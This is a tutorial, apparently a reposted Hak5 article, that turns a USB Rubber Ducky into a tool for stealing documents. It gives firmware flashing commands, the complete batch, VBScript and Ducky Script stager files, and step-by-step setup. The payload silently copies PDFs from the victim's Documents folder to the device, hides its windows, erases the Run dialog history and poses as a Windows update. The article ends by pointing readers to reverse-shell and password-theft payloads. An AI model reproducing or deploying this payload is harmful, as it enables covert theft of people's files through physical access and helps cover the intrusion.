Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained

As a keystroke injection attack tool capable of mimicking both a USB keyboard and mass storage, the USB Rubber Ducky excels at autonomously exfiltrating documents – or what we like to call performing an involuntary backup. In this article I will briefly outline the steps necessary to create turn your USB Rubber Ducky into a document exfiltration machine, as described on Hak5 episodes 2112, 2113 and 2114.

What the Duck?

If you’re new to the USB Rubber Ducky, it is the original keystroke injection attack tool. That means while it looks like a USB Drive, it acts like a keyboard – typing over 1000 words per minute. Specially crafted payloads like these mimic a trusted user, entering keystrokes into the computer at superhuman speed. Once developed, anyone with social engineering or physical access skills can deploy these payloads with ease. Since computers trust humans, and inherently keyboards, computers trust the USB Rubber Ducky. So let’s go violate this trust…

You will need

Flash your USB Rubber Ducky to the “Twin Duck” firmware

Either using the dfu-programmer command and c_duck_v2.1.hex manually, or the ducky-flasher tool, flash the USB Rubber Ducky with this “Twin Duck” firmware from Midnightsnake to enable both USB HID Keyboard and USB Mass Storage. Begin by firmly holding down the micro push button on the USB Rubber Ducky while plugging it into your Linux computer and keep it held for around 5 seconds after connection. Then either run the ducky-flasher tool and follow the wizard, or use the dfu-programmer to manually erase, flash and reset the device.

sudo dfu-programmer at32uc3b1256 erase
sudo dfu-programmer at32uc3b1256 flash --suppress-bootloader-mem c_duck_v2.1.hex
sudo dfu-programmer at32uc3b1256 reset

Rename the Micro SD card volume label to “_”

Using gparted or Windows explorer, rename the USB Rubber Ducky’s Micro SD card volume label to “_” (sans quotes). This will save characters and thus make our our stager payload faster. The easiest way to rename the volume label is from Windows Explorer. From “My Computer” select the drive and press F2. Type _ and press enter. Done.

Copy the staged payload to the root of the newly renamed Micro SD card

You’ll need 3 files and 1 directory — d.cmd, e.cmd, i.vbs and a “slurp” directory. Our stager will execute d.cmd from the root of the drive with the volume name “_”. In this case d.cmd will invisibly execute e.cmd using the i.vbs.


@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~d0i.vbs %~d0e.cmd


@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerRunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0slurp%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%Documents*.pdf %dst% >>nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%Documents*.pdf %dst% >>nul

start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"



CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Finally create the slurp directory on the root of the Micro SD card labeled “_”

Encode the stager payload

Now that the firmware is flashed and the staged files are in place, we’re ready to setup the stager. This will be a very quickly executing ducky script which calls the files on the Mass Storage drive in order to copy files from the users Documents folder.

REM USB Exfiltration Payload from Hak5 episodes 2112 - 2114
REM Target: Windows XP SP3+ Author: Hak5Darren Props: Diggster, Midnightsnake
DELAY 1000
STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')"

Save this as a standard ASCII text file ready to be encoded by any number of the Ducky Script Encoders, such as the command line Java encoder, the GUI Java encoder, the command line Python encoder/decoder or the Online Ducky Script Encoder.

Finally copy the resulting inject.bin file to the root of the Micro SD card. You should now have 4 files and 1 directory on the root — inject.bin, d.cmd, e.cmd, i.vbs and the slurp directory.

That’s it! Plug the newly configured USB Rubber Ducky with the Exfiltration payload into the target machine and in seconds it will begin invisibly copying files from the user’s Documents directory. Of course all of this can be customized and configured by altering the cmd files on the root of the Micro SD card. By default PDF files will be copied to the slurp directory in a new directory named after the hostname and US date and time stamp. Enojoy!

What next?

Now that you’ve created a USB Rubber Ducky capable of exfiltrating documents, perhaps you’d like to check out some other popular payloads – like the 3 Second Reverse Shell with a USB Rubber Ducky, or Pilfering Passwords with the USB Rubber Ducky – a 15 Second Password Hack, Mr Robot Style. Now go forth a duck ’em!

Source: Security news